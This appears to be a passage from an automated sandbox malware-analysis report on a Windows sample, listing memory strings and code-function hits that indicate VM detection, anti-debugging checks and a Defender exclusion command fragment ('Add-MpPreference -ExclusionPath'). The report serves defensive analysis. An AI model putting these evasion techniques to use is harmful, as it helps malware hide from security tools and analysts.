          Source: explorer.exe, 0000000B.00000002.510154790.0000000003755000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000B.00000000.329940814.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 0000000B.00000000.292794369.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}AppData
          Source: powershell.exe, 00000001.00000003.363071692.00000000053AB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01114120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01110050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01110050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01173884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01173884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01123B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01123B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011AD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01101B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01101B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01124BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01124BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01124BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01113A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01108A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01134A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01134A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01184257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0113927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0117A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01117D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01133D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01173540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
